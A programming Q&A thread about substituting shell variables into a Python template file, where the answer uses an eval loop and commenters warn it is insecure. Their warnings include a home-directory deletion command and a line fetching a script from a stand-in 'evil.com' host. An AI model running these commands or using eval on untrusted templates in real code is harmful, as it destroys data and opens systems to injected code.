# Replace Environment Variables in File

Tags: bash, shell, environment-variables, zsh

I have a `myfile` which contains lines like

```
#!/usr/bin/env python3
print("Hello world")
names = ('${(j:', ':)ZSH_VAR[@]}', )
```

I would like to pre-process this file with the environment variables in my loaded shell (`zsh` in my case, but a generic `bash` solution would also work nicely).

How can I do the equivalent of

```
$ declare -ga ZSH_VAR=( 1 2 3 )
$ preprocess < myfile
```

Such that the output is

```
#!/usr/bin/env python3
print("Hello world")
bar=('1', '2', '3', )
```

Comment: I'm not sure I understand properly, but are you looking for [`envsubst`](https://linux.die.net/man/1/envsubst)?

Comment: ``eval 'bar="$BAR"'`` or ``declare 'bar="$BAR"'``?

Comment: See the [TemplateFiles](https://mywiki.wooledge.org/TemplateFiles) page on the Wooledge wiki.

Answer (score 2):

You can use `eval` for that purpose.

```
$ BAR=1234 FOO=abcd; while read -r line; do eval 'echo "'"$line"'"'; done < "file"
```

Or in script. (**script.sh**)

```
#!/bin/bash

while read -r line; do eval 'echo "'"$line"'"'"; done < "file"

# If you want to redirect the output into a file (out.txt).
# while read -r line; do eval 'echo "'"$line"'" >> out.txt'; done < "file"
# Or  this
# while read -r line; do eval 'echo "'"$line"'"'; done < "file" > out.txt
```

Then call the script like this:

```
FOO=abcd BAR=1234 ./script.sh
```

**Note**

BE CAREFUL. MAKE SURE YOUR FILE DOES NOT CONTAINS `rm` commands. JUST TO BE SAFE.

Comment: Only to be used if you trust the data, though. Much safer to use `envsubst` instead; no chance of a `$(rm -rf ~)` in your file destroying your home directory.

Comment: And if you _are_ going to use `eval`, better to use `eval 'echo "'"$line"'"'` so you don't have a line containing `* HELLO *` replace the `*`s with lists of filenames, or changing tabs to spaces, or deleting leading tabs, or so forth. Which is to say, as currently written, this answer has quite a lot of unexpected/undesired behaviors.

Comment: See demonstration of the above issues at https://ideone.com/mBq9IS

Comment: ...compare output of above to the less-broken (but still insecure) approach demonstrated at https://ideone.com/FjpPC0

Comment: BTW, I'd suggest putting the `>>out.txt` after the `done`, not after the individual `echo` or `eval` -- that way you only open the output file once instead of re-opening it for every individual line. And at that point you can just use `>out.txt` unless you _explicitly_ want to keep the output of any prior invocations, instead of being forced to use the append operator.

Comment: (Note also the `IFS=` before the `read` in the link showing the fixed version -- that stops `read` from deleting leading and trailing whitespace before it even gets into the `line` variable!)

Comment: BTW, it's not like `rm` is the only dangerous command. Someone could have `$(curl http://evil.com/rootme.sh | curl)` in a template, and that's just as bad; maybe worse, if you don't notice and have someone encrypting/stealing your data while you rotate old backups out.

Comment: Good idea!  However this doesn't solve my problem, which is that I need to edit a Python script template to replace a single value -- so the entire file is Python source, except for a single line to join an array `typenames = ('${(j:', ':)argv[@]}', )`